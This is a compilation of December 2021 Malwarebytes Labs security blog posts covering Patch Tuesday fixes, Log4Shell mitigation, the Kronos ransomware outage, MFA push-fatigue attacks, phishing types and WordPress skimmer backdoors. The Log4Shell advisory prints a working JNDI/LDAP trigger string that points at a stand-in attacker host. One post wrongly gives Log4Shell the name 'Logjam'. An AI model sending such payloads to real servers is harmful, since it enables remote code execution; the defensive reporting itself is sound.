IT News

For anyone about to sit back after checking their environment for the Log4j vulnerabilities and applying patches where needed, here are some more things that need patching.

Microsoft

In 2021’s final Patch Tuesday, Microsoft included a total of 67 fixes for security vulnerabilities. The total set of updates includes patches for six publicly known bugs and seven critical security vulnerabilities.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Let’s have a look at the most interesting ones that were patched in this Patch Tuesday update.

CVE-2021-42310 Microsoft Defender for IoT Remote Code Execution vulnerability. Due to a flaw in the password reset request process, an attacker can reset someone else’s password. The attack may be launched remotely. No form of authentication is required for exploitation.

CVE-2021-43905 Microsoft Office app Remote Code Execution vulnerability. This vulnerability was rated 9.6 out of 10 on the CVSS vulnerability-severity scale, and Microsoft thinks it is likely to be exploited.

CVE-2021-43899 Microsoft 4K Wireless Display Adapter Remote Code Execution vulnerability. This vulnerability was rated 9.8 out of 10 on the CVSS vulnerability-severity scale, even though Microsoft says it’s not likely to be exploited. You will need to install the Microsoft Wireless Display Adapter app from the Microsoft Store onto a system connected to the Microsoft 4K Wireless Display Adapter. Once installed, use the Update & security section of the app to download and install the latest firmware.

CVE-2021-43890  Windows AppX Installer Spoofing vulnerability. This vulnerability allows an attacker to create a malicious package file and then modify it to look like a legitimate application. We reported on this vulnerability being used in the wild by Emotet (among others).

CVE-2021-43883 Windows Installer Elevation of Privilege vulnerability. This is a patch to patch a bypassed patch in Windows Installer that was initially fixed in November. By exploiting this vulnerability, threat actors that already have limited access to compromised systems can elevate their privileges and use these privileges to spread laterally within a target network.

CVE-2021-43215 iSNS Server Memory Corruption vulnerability can lead to remote code execution (RCE). An attacker could send a specially crafted request to the Internet Storage Name Service (iSNS) server, which could result in an RCE. The Internet Storage Name Service (iSNS) protocol is used for interaction between iSNS servers and iSNS clients.

CVE-2021-43217 Windows Encrypting File System (EFS) Remote Code Execution vulnerability. An attacker could cause a buffer overflow write leading to unauthenticated non-sandboxed code execution. Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how EFS makes connections from client to server. When the second phase of Windows updates become available in Q1 2022, customers will be notified via a revision to the security vulnerability.

CVE-2021-41333 Windows Print Spooler Elevation of Privilege vulnerability. Exploit code for this vulnerability is available and the code works in most situations where the vulnerability exists., which makes it a priority to fix, even if we haven’t seen any attacks using this in the wild.

Apple

Apple has also published security updates. The update includes fixes for the remote jail-breaks that were demonstrated at the TianfuCup in October.

Apple has issued security updates for the WebKit in Safari 15.2 and for a total of 42 vulnerabilities in iOS 15.2 and iPadOS 15.2. Included in the patches were several security vulnerabilities that allowed anyone with physical access to a device to view contacts on a locked device, and to view stored passwords without authentication.

Others

Other vendors that issued updates to keep an eye on were:

• Google (Chrome)
• Adobe
• SAP
• Apache, Cisco, vmWare, UniFi, and probably others as well, issued Log4j related patches.

Stay safe, everyone!

The post After Log4j, December’s Patch Tuesday has snuck up on us appeared first on Malwarebytes Labs.

As you may already know, the business, tech, and cybersecurity industries have been buzzing about Log4Shell (CVE-2021-44228), aka Logjam, the latest software flaw in an earlier version of the Apache Log4j logging utility. As the name suggests, a logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.

Understandably, this may be the first time you’ve been told explicitly about the Log4j tool, but what many don’t realize is that hundreds of millions of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, rely on it. The software and online services you use in your business may be Java-based, too, thus opening you up for possible exploitation.

Exploiting this flaw allows hackers to worm their way into unpatched systems to take control. It’s seriously bad to have this on any endpoint because of its ultra-wide attack surface and the accompanying damage potential that could bring.

Read everything you need to know about Log4Shell in our blog post,
“Log4j zero-day ‘Log4Shell’ arrives just in time to ruin your weekend.”

Because of all of this, there is a great need for businesses, particularly SMBs, to protect themselves against threats that take advantage of the Log4shell vulnerability. Most certainly now that Microsoft has started seeing underground groups they dub as “access brokers,” those exploiting Log4Shell to infiltrate and gain initial access from target company networks in the hopes of selling them to ransomware threat actors.

According to the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender Threat Intelligence Team in a blog post: “We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.”

Ransomware is not the only concern here, too. Threat actors can also install cryptominers, malware that turns devices into bots and making them part of a botnet—which Mirai bot herders have already started doing—and Cobalt Strike, which cybercriminals abuse to perform network surveillance.

How can SMBs protect themselves from Log4j-enabled attacks?

SMBs who use Linux can start off by checking if the version of the platform they are using is affected. TechRepublic published a nifty guide on just how to do that.

SMB Windows users, on the other hand, should expect to be vulnerable as Microsoft uses Java-based apps in their products. The company has provided a lengthy guidance on the matter of Log4j here, which they have regularly updated with observations on criminal movement involving the abuse of the Log4Shell flaw. It is essential to continuously return to that blog post for updates.

Once you have determined that your platform is impacted by Log4Shell, you must upgrade to the latest version of Apache Log4j, which is 2.15.0. If you’re using versions between 2.10 and 2.14.1 but can’t update to the newest version yet, RiskIQ advises organizations to change the following JVM parameter value to “true” and restart the Java process:

-DLog4j2.formatMsgNoLookups=true

“Organizations who are unclear where to include this parameter must check the documentation of the related Java project/product in use for the correct place,” the company further advises. “Alternatively, they may set the LOG4J_FORMAT_MSG_NO_LOOKUPS=”true” environment variable to force this change. Kubernetes deployments may use this environment variable approach to set it across Kubernetes clusters, effectively reflecting on all pods and containers automatically.”

Finally, the Cybersecurity & Infrastructure Security Agency (CISA) encourages users and business administrators to visit the review this Apache Log4j Security Vulnerabilities page to apply other recommended mitigations steps as soon as possible.

The post What SMBs can do to protect against Log4Shell attacks appeared first on Malwarebytes Labs.

Human resources platform provider UKG has put out a statement saying it’s fallen prey to ransomware that has disrupted the Kronos Private Cloud. It expects the service to be out for several weeks.

The statement came after the company posted a message on the Kronos community message board, explaining that staff noticed unusual activity impacting UKG solutions using Kronos Private Cloud.

It’s unfortunate timing, given that the outage will likely cause Kronos customers to miss payroll for this week. Of course that’s never welcome, but it’s extra painful now, considering how close Christmas is. Kronos’ work management software is used by dozens of major corporations, local governments, and enterprises.

Kronos Private Cloud

UKG describes Kronos Private Cloud as a secure storage and server facility hosted at third-party data centers. It is used across UKG companies.

Other services impacted by the incident include Healthcare Extensions, UKG TeleStaff, and Banking Scheduling Solutions. The company is not aware of an impact to UKG Pro, UKG Ready, UKG Dimensions, or any other UKG products or solutions, which are housed in separate environments and not in the Kronos Private Cloud.

Under investigation

The company engaged cybersecurity experts to assess and resolve the situation, and has notified the authorities. The investigation remains ongoing, as it works to determine how bad and widespread the incident is. The company would not answer questions about which ransomware group was behind the attack.

UKG has urged customers to evaluate and implement alternative business continuity protocols related to the affected UKG solutions.

Employee data

Given the nature of the company and the fact that there is talk of ransomware, there is fear that private data may have been stolen. Many ransomware families steal confidential information before encrypting the files on the compromised network. They then use these data as extra leverage, threatening to publish the data if the victim refuses to pay the ransom.

UKG states that currently, there is no indication of compromise to employee data, but it is part of the ongoing investigation. Other sources have said that UKG contacted them and other clients to tell them that the ransomware attack may have compromised employee information like names, addresses, social security numbers, and employee IDs.

While it is important to know if your personal details or credentials have been leaked, it is significantly more important to act on it. What do you do now, knowing that your account has been compromised?

This all depends on what has been stolen, but let’s assume the worst and say it is your Social Security Number. A malevolent person who has your Social Security Number can use it to get other personal information about you. A few important things to remember:

• Keep a close eye on your banking and eMoney accounts. Use the activity alerts that some banks offer.
• Keep tabs on your posts in social media. It may look silly to check what you have supposedly posted yourself, but imagine someone else doing it for you.
• Don’t pay for identity theft protection services. While this may seem counterintuitive, if the company responsible for keeping your data safe doesn’t pay for these services, it is almost never worth spending your own money on them.

Updates

UKG has promised to post regular updates on its website. If you are a customer, you can reach out to UKG or have a look at its community message boards. If we find out more about this attack, we will keep you posted here.

Stay safe, everyone!

The post Kronos crippled by ransomware, service may be out for weeks appeared first on Malwarebytes Labs.

A little more than 20 months ago, many people around the world were asked or instructed to work from home to help slow the spread of COVID-19. It caused a seismic change to the way we all do business.

Now, our latest research reveals how IT decision makers’ security concerns have been changed by enduring from home for so long; how they’ve adapted with new tools and training; and how confident they now are in their remote employees’ approach to security.

It also sounds a warning: That while employees care about getting security right, many are also suffering from “fear fatigue”. Adrenaline-fuelled anxiety and adaptation have left them feeling jaded or overwhelmed, making them vulnerable to simple security mistakes.

The story so far

The novel coronavirus outbreak of 2019 was declared a pandemic on 12 March 2020, and by April half the world’s population had been asked or ordered to stay at home. We have since learned that breaking transmission between co-workers—by asking them to work from home—is an effective way to slow the spread of the virus. As such, it has become a mainstay of our collective response to outbreaks and looks set to be a feature of working life for the foreseeable future.

What was once a novelty for many organizations has now become decidedly normal. The initial period of rapid, violent change forced businesses to implement expedient solutions, which created enormous headaches for IT and security teams, and new opportunities for attackers. Since then, the businesses that have survived the slings and arrows of the pandemic have had some time to take stock and look for better ways to work from home.

So, in the summer of 2021 we decided to survey 200 IT decision makers to find out how 18 months of working from home during a pandemic has changed the way organizations think about security, and how they have had to adapt.

This is what we learned:

1. IT has changed

Working from home has changed the devices and applications that employees use to get work done. Most obviously, home work requires communication and collaboration tools where employees can work together. They are the bricks and mortar of the virtual shared spaces that have replaced offices.

Unsurprisingly, more than 70% of our respondents told us their organizations now make greater use of video conferencing platforms like Zoom, use more cloud storage, and rely more heavily on instant messaging solutions, like Slack.

That’s important, because when employees change the way they use their computers, it changes the IT and security functions they rely on.

2. Security concerns have changed

Changes in where and how work is done have altered the risks that organizations care about. Chief among their concerns are how to control company data in the dispersed, cloud-dependent world of remote work.

63% of the IT decision makers we surveyed listed “exposing data or information accidentally” as one of their greatest cybersecurity concerns, while 52% listed the difficulty in off-boarding remote employees to prevent unauthorized future access.

A change in security concerns calls for a change in the way security is practiced, and it’s clear there have been significant changes here too.

3. Security measures have changed

When security concerns change, it’s only right that the way we practice security changes too. 74% of the IT decision makers we spoke to told us they’d responded to changing conditions by implementing new tools to enhance security, while 71% have rolled out new forms of training.

Our research reveals a reported increase in the use of cybersecurity and antivirus tools, password managers, Virtual Private Networks (VPNs), and two-factor authentication (2FA) among businesses working from home.

However, that work appears unfinished. Despite this investment in tools and training, decision makers also told us that finding the right cybersecurity tools and training to support remote work are still among their biggest challenges. In fact the only thing that ranked higher was the challenge of working with limited IT resources.

Those challenges notwithstanding, progress appears to have been made—in some organizations at least.

4. Businesses have adapted

April 2020 and the months that followed were a time of enormous, acute upheaval, and the eighteen months from then until we conducted our research continued to pose significant challenges for businesses. Nevertheless, some appear to have made progress towards a safer form of remote work.

62% of the decision makers we surveyed told us that their employees were either “very” or “acutely” aware of the security best practices they need to follow. And they aren’t simply passive observers: 83% want to do the right thing, and care about their security responsibilities. Overall, 56% of our respondents said their organizations had become slightly or significantly more secure since they began working from home, although it is worth noting that one quarter believe they are still less secure.

Overall, our decision makers appear to believe their employees know and care about security. However, our research also hints that, unmanaged, that caring could itself become a problem.

5. Adaptation has a human cost

Stress is an overused and undervalued word. It is a normal, physiological response to being threatened or feeling pressure, and if it’s sustained over a lengthy period of time it can lead to exhaustion and burnout. After 18 months of the COVID-19 pandemic, almost 80% of our survey respondents reported some level of jadedness or “fear fatigue” in their organization.

This should not be a surprise—the threat of the novel coronavirus, and everything that made up the response to it, provided no end of potential sources of stress. Among them is the need to keep remote employees appraised of the increased cyberthreats they now face, and informed about how to deal with them. Alarmingly, a quarter of our decision makers reported that employees seemed “overwhelmed” by threats and jaded by security procedures.

It is a warning shot: It is good, imperative even, that remote employees care about the security threats they face and know what to do when they meet them. But the pandemic is far from over, and organizations need to tread a fine line between equipping their employees and overwhelming them.

To learn more about how the world of work is adapting to cyberthreats in the age of remote work, and how to deal with the looming threat of fear fatigue, read our report Still Enduring from Home.

The post 5 security lessons from 18 months of working from home appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend
• Click “OK” to defeat MFA
• Fake job interviews plague major game developers like Riot Games and Rockstar
• Has your WordPress site been backdoored by a skimmer?
• What is a search engine and why does anyone care which one you use?
• Vulnerability in Windows 10 URI handler leads to remote code execution
• Was threat actor KAX17 de-anonymizing the Tor network?
• Is your web browser vulnerable to data theft? XS-Leak explained
• Microsoft disrupts China-based hacking group Nickel
• How to check for Windows updates and install them
• Why Macs are the best, according to Mac expert Thomas Reed: Lock and Code S02E23
• NSO Group spyware found on iPhones of US State Department employees

Stay safe!

The post A week in security (Dec 6 – 12) appeared first on Malwarebytes Labs.

There are many types of phishing attack nowadays, to the extent it can be tricky to keep up with them all. We have unique names for mobile attacks, postal attacks, threats sent via SMS and many more besides. However, we often see folks mix up their spears and their whales, and even occasionally confuse them with regular phish attempts. We’re here to explain exactly what the difference between all three terms is.

What is a phishing attack?

Think of this as the main umbrella term for all phishing attempts. It doesn’t matter if it’s a spear, a whale, a smish or a vish, or anything else for that matter. They’re all able to be grouped under the banner of “phishing”. This is where someone tries to have you login on an imitation website. This site may emulate your bank, or a utility service, or even some form of parcel delivery.

They get you on the site in the first instance by sending a fake email, or text, or some other missive. The bogus message will emulate the real thing, and may be very convincing in terms of looking like the genuine article. They may also use real aspects of the actual website inside the email.

The phishing page, too, may steal real images or text from the genuine website. It’ll ask you for logins, or payment details, or both. Depending on what the phishers intend to do with stolen accounts, you may find they change your logins too.

What is spear phishing?

Regular phishing attacks are blasted out to random recipients in their hundreds, thousands, or hundreds of thousands. The sky is the limit. The attackers are hoping that if just a few people respond, they’ll be able to make their ill-gotten gains pay off. It’s potentially low risk, high reward.

Spear phishing, by contrast, is when the phisher targets specific people. It could be individuals, or people at a certain business. The intent may be financial, or it could be a nation state attack targeting folks in human rights, or legal services, or some other sensitive occupation.

What is whaling?

Whaling is the gold standard for targeted phish. They’re the biggest and most valuable people or organisations to go after. “Whales” are typically CEOs or other people crucial to the running of a business. They’ll have access to funds or be deeply embedded in payment processes/authorisation.

CEO/CFO fraud, where scammers convince employees that the CEO/CFO needs large sums of money wired overseas, is common. This is also more broadly known as a business email compromise scam.

The only way you’ll likely run into this attack if you’re not a CEO/CFO/similar is if you work in a department tied to money transfers. For example, in payroll, or some other financial aspect of the organisation. You’ll need to keep an eye out for bogus wire transfer requests, and the business should have processes and safeguards in place to combat CEO/CFO fraud attempts.

Further reading

We have a longer guide to avoiding spear phishing here. We also have a more general guide to detecting phishing attacks, which will hopefully help keep you safe from harm no matter what variety of phish you’re facing.

The post Spear phish, whale phish, regular phish: What’s the difference? appeared first on Malwarebytes Labs.

If you’re running a service that relies on Apache Struts or uses the popular Apache Log4j utility we hope you haven’t made plans for the weekend.

An exploit listed as CVE-2021-44228 was made public on December 9, 2021. The exploit is simple, easy to trigger, and can be used to perform remote code execution (RCE) in vulnerable systems, which could allow an attacker to gain full control of them. All an attacker has to do is get the affected app to log a special string. For that reason, researchers have dubbed the vulnerability “Log4Shell”.

The vulnerability has a CVSS score of 10.0 out of a possible 10. It impacts Apache Log4j versions 2.0-beta9 to 2.14.1. Mitigations are available for version 2.10 and higher.

Log4j is an open source logging library written in Java that was developed by the Apache Software Foundation. Millions of applications use it, and some of them are enormously popular—such as iCloud, Steam, and Minecraft—so the potential reach of this problem is enormous.

Used in the wild

After the 0-day was posted on Twitter, along with a proof-of-concept that was published on GitHub, the exploit has already been spotted being used in the wild by CERT New Zealand, CERT Austria, and CERT Germany. Along with many others, they are seeing automated systems trying to exploit the vulnerability.

The vulnerability is triggered by a simple string sent to a vulnerable server:

${jndi:ldap://example.com/a}

When the vulnerable application logs the string it triggers a lookup to an attacker-controlled remote LDAP server (example.com in our scenario). The response from the malicious server contains a path to a remote Java class file that’s injected into the server process. Attackers can execute commands with the same level of privilege as the application that uses the logging library.

Given how common this library is and how serious the consequences of a relatively easy-to-exploit vulnerability can be, this is a recipe for disaster. Many organizations will not even realize they are vulnerable.

According to researcher Marcus Hutchins, in the case of Minecraft, attackers were able to get remote code execution on Minecraft servers by simply pasting the malicious string into the chat box. Similar examples exist for a number of other popular services.

Mitigation

Mitigations are available for versions of log4j 2.10.0 and up. Version 2.15.0 is not vulnerable by default. Note that there may be other dependencies, such as your Java version, that need to be updated before you can upgrade. Fixing the vulnerability may not be straightforward, but it is urgent.

According to the Apache log4j project, if you are unable to upgrade, for whatever reason, you can mitigate this vulnerability in version 2.10.0 or higher by switching log4j2.formatMsgNoLookups to true. This can be done by adding ‐Dlog4j2.formatMsgNoLookups=True to the JVM command for starting the application.

Sadly, there is little, if anything, that users of affected systems can do to make themselves less vulnerable to the consequences. No doubt many systems will be affected and system administrators will want to treat anomalies with extreme caution.

So, if you’re an administrator looking forward to a quiet weekend, you know what to do!

Stay safe, everyone!

The post Log4j zero-day “Log4Shell” arrives just in time to ruin your weekend appeared first on Malwarebytes Labs.

Researchers have discovered that Nobelium—the threat actor behind the infamous SolarWinds supply-chain attack, the Sunburst backdoor, TEARDROP malware, GoldMax malware, and other malicious activities—has found a way to use stolen credentials even when they require multi-factor authentication that relies on smartphone push notifications.

And the technique used by this highly sophisticated threat actor? Nag users until they get bored.

Stealing credentials

In a report by Mandiant that describes several attack stages and scenarios by this group, one that jumped out at me involved the threat actor compromising service providers, and then using the privileged access and credentials belonging to these providers, to compromise downstream customers.

Attackers used the stolen credentials in a login page, which triggered a push notification to a device belonging to the credentials’ rightful owner. In theory the attacks should have been stopped there, because one of the two factors required for authentication—the push notification—needed the victim’s consent. In practice, that didn’t always work.

Nobelium used several tactics to get hold of valid credentials:

• CRYPTBOT, an info-stealing malware.
• Spear phishing campaigns.
• Password guessing or password spraying.
• Backdoors like FoggyWeb.

But often, having these credentials was not enough to gain access to the sensitive information the group was after. Most of the important services and assets required multi-factor authentication (MFA) authentication.

A brief introduction to MFA

Multi-factor authentication requires at least two different forms of authentication, from at least two out of three fairly broad categories:

• The “something you know” category is the factor we are most familiar with. It requires a person to enter information that they know in order to gain access to their account. Passwords and PIN codes are the most common examples, but things like security questions used by your bank also fall into this category.
• The “something you have” factor leans on something you have access to. That might be a separate email account or phone to which a verification code can be sent, but it can also be specialized hardware like a YubiKey.
• The “something you are” category centers on certain physical markers (biometrics) that can be analyzed by technology to prove your identity. The most common examples are fingerprints and face recognition.

The most common forms of multi-factor authentiction rely on a password (something you know) and a PIN code or push notification sent to your phone (something you have).

Push notifications as a second factor

Many MFA providers use a second factor that sends a push notification or phone call to a user’s phone just after they’ve entered a password. Users are expected to press a key on a phone app to approve the login. (These fall into the “something you have” category, because you need physical access to the phone to approve the login.)

If a user receives a push notification out of the blue, at a time when they aren’t trying to log in, that means somebody else is trying to use their password. If that happens they obviously aren’t supposed to approve the login.

Mandiant’s research reveals that a threat actor found a way around this form of authentication by simply issuing repeated MFA requests until the user became so bored, confused or frustrated they accepted.

Perhaps this shouldn’t be a surprise. In circumstances where users are busy, pressed for time, or simply tired of dialog boxes or notifications, many have the gut reaction to do whatever it takes to stop the nuisance that is distracting them. If all they have to do is hit “OK” on a prompt (a prompt they have seen lots of times before when it was perfectly safe to hit “OK”), many may not even think twice. Or if they do, it will be too late.

Push vs SMS

Push notifications are often seen as an improvement over a more widely used but less secure form MFA that relies on SMS messages. Instead of hitting “OK” on a push notification, users enter a code—sent by SMS to their phone—alongside their username and password.

This attack shows that logic might not be right, at least not for everyone. Because push notifications are triggered automatically they could potentially be used in a “spray and pray” type of attack, where the threat actor tries to break into many different accounts at the same time, hoping that lots of people will absent-mindedly hit OK.

By contrast, attackers who want to compromise SMS-based MFA have to find a way to intercept the code being sent to the victim. Attacks often do this by persuading the victim’s cellphone carrier that they own the number and want to move it to a different phone, which puts the attacker in possession of the victim’s “someting you have”. Although this is highly effective, and serious enough that it’s causing people to move away from SMS-based MFA, it is very difficult to compromise lots of different phone numbers with this kind of “SIM swap” attack at the same time. So while it is very effective in targeted attacks, SIM swapping is completely unsuitable for large-scale attacks.

It’s also worth noting that the reflex to click “OK” to stop the annoying prompts does not work for SMS.

SMS authentication can potentially be exploited on a large scale by phishing though. If attackers can lure victims to a fake login page they can capture their usernames, passwords, and 2FA codes and then forward them to the real login page. Obviously, due to the normally very limited lifespan of the code, the attacker will have to be fast.

Mitigation

Both SMS and push notication-based MFA are improvements over no MFA at all, but both have their flaws. As an organization you should consider using a more restrictive type of MFA, at least for important assets.

Hardware keys are a much more robust second factor. They may be more expensive, but imagine the cost of a major breach they could save you from.  

Until you start using hardware keys, we hope that if you receive an unexpected prompt you will alert your security team, rather than try to get rid of it as fast as you can.

Stay safe, everyone!

The post Click “OK” to defeat MFA appeared first on Malwarebytes Labs.

An attempt at a simple definition: a search engine is a software system that allows users to find content on the Internet based on their input.

The introduction of the major search engines brought about huge changes in the way we use the Internet. There is a wealth of knowledge available for those that know where to look. One search engine has become such an important factor of our online life that to google has become an accepted verb. It was even elected the “most useful word of 2002” by the American Dialect Society. At the time of writing over 90% of the search engine market has been acquired by Google.

Search queries

The time that the input for a search engine was limited to text queries have long gone. Most major search engines also offer you the option to perform reverse image search. Using reverse image searches, you can find images similar to the one that you are querying for.

The most popular search queries of a year can tell historians from the future what we cared most about at the time. The top 3 for 2020 was:

1. Election results
2. Coronavirus
3. Kobe Bryant

Search engine optimization

The fact that companies want to be found by search engines has led to a set of marketing techniques aimed at raising the popularity of a website. The goal is to have your site high up in the search results when a user searches for certain keywords that are relevant for your business. The name for these techniques is search engine optimization (SEO). The ranking of a site in Google’s search results is primarily based on how well the page is optimized, but it’s also based on “reputation.” The reputation of a page is calculated, among others, by using the number of inbound links pointing to that page. It helps a lot if the incoming links come from pages that are about the same or related subjects, but a large amount of links coming from all kinds of sites helps as well.

Default search engine

Sometimes you will see prompts that the default search engine of your browser was changed, or you will be asked to change the default search engine.

In the example displayed above, Chrome is warning the user about a search hijacker that has taken control of the user’s default search engine. You may also see a browser asking you to change back to the default search engine it came with, or even websites asking you to change your default search engine.

How do search engines make money?

Although there are different ways in which search engines make money, the majority comes from asking for money from companies that want to show up in search results in a noticeable way.

• Organizations can buy advertisements that get displayed above the actual search results.
• Organizations can pay to get their logo and core information displayed along the search results leading to their websites.
• Organizations can pay for marketing data based on consumer’s habits.
• Search engines can sell their search results to others so they can create directories, verticals, or catalogs.
• Search engines can sell clicks on links in the search results.

The revenue of these activities are so profitable that some potentially unwanted programs and adware programs make money for their creators in the form of search hijackers.

How do search engines work?

Where do search engines find the results that are a fit with the query and how do they do it so fast? Most search engines are crawlers. A crawler search engine generates its results by the automatic compilation of web pages and sites. Websites that can not be crawled are part of the Deep Web. The Deep Web is what we call the unindexed part of the Web, which is any site that a search engine can’t find. A part of the Deep Web that you may have heard of is the Dark Web. The Dark Web is intentionally hidden, anonymous, and widely known for illicit activities.

Or as this meme explains it with a wink at those struggling for good SEO results:

Crawlers are directories and verticals, which are different kinds of user-generated collections of search results and sites. If these selected results are paid for, then we call these sponsored search engines.

The speed with which the major search engines can come up with search results are due to data centers around the world. While you’re typing your search query, the search engine predicts the rest of your query, combs through billions of web pages, ranks the sites, images, videos, and products it finds, and presents you with the very best results. And it does all that usually in less than a tenth of a second. To us mere humans that is practically instant. From wherever in the world you perform a Google search, the results are most likely served to you from nearby computers.

What is the most private search engine?

There are several search engines that help you maintain your anonymity online while searching for answers to your queries. Of those, DuckDuckGo and Brave are the most well-known ones. Both are crawlers and can deliver speedy results, without tracking user searches, building user profiles, or requiring the use of an external, pre-existing search index to deliver results.

And for those that are looking for a search engine that is both privacy and environmentally friendly, you can have a look at Ecosia.

Choosing a search engine

You can find and change the default search engine in your browser settings. Where exactly depends on your browser, but in the browsers I checked it is one of the main items in the “Settings” menu.

Which one you should use? Whatever suits your needs best. We always like our readers to make up their own mind while we try and provide them with the information to base their decision on.

Happy searching and stay safe, everyone!

The post What is a search engine and why does anyone care which one you use? appeared first on Malwarebytes Labs.

Skimmers and other threat actors are backdooring websites, and WordPress instances in particular, according to a recently released report.

Researchers at Sucuri say attackers have developed methods to make sure that their grip on the infected site is not easily removed by applying the next update. They create a backdoor for themselves so they can easily take back control and insert their own code.

WordPress as a target

WordPress, the most popular web content management system (CMS), has seen its fair share of plugins that leave online shoppers vulnerable.

One common mistake website owners often make is to leave their CMS unpatched thinking they are not an interesting target. In many cases, users may choose not to apply security updates for fear of introducing bugs or even stop a website from loading properly. This behavior creates the perfect opportunity for online criminals to exploit known vulnerabilities on a large scale.

However, the research by Sucuri shows that even site owners that patch promptly are not safe from certain threat actors.

Creating a backdoor

To make sure they can stay inside the site once they’re in, the threat actors create a backdoor that either re-inserts the malicious code or allows the threat actor access to do it manually. Attackers have developed different methods for protecting their work.

In most cases of this type of infection, we will find a modified index.php which in some cases automatically regenerates itself through a malicious process running in the background. The persistent, running processes on the server are what allows the malware to automatically and immediately reinfect the site once the infection is removed. Even on non-WordPress sites the attackers will replace index.php with an infected copy of the WordPress index.php file.

In other cases, the researchers found hundreds or sometimes thousands of infected .htaccess files scattered throughout the website directories. These are designed to prevent custom PHP files or tools from running on the site in case there’s mitigation already in place.

In other cases you may find a modified wp-includes/plugin.php file designed to re-create the index.php and .htaccess. But even though plugin.php is a common point of attack, similar code has been found in other core files.

Identifying and cleaning the problem

Malicious code on your website can be planted there for various reasons, such as for card skimming or spreading malware. To keep an eye on your site, the following areas are important:

• File integrity, make sure that your core files can’t be changed without you being aware of the changes. One option to do this is file integrity monitoring through active server-side scanners.
• Logging. All important changes on your site should be visible in logs. New plugins, updates of the CMS and plugins, and file changes should be monitored. If you do not recognize them as something you implemented, then investigate them.

This Sucuri blog has elaborate instructions on how to remove these infections, should you find your site has fallen victim to these threat actors.

Protecting your site

For website owners there are some guidelines to stay safe from these  practices.

• Put your website behind a firewall. Or take other measures that restrict access to the wp-admin area to only specific IP addresses.
• Regularly change all admin passwords associated with your site. This includes the admin dashboard, CPanel/FTP, ssh and email. Where possible enable MFA.
• Keep all plugins, themes and your CMS up to date at all times and remove any unneeded plugins or themes. Speed is important. Attackers are always aware of the latest vulnerabilities and will scan the Internet for unpatched sites to hijack, sometimes within hours of a patch being made available.

You can read more in our article: How to defend your website against card skimmers.

For visitors of shopping sites, take as many precautions as possible. There are browsers and browser configurations that will help you against falling victim to skimmers, malicious redirects, and other unwelcome code on a site you are visiting.

Stay safe, everyone!

The post Has your WordPress site been backdoored by a skimmer? appeared first on Malwarebytes Labs.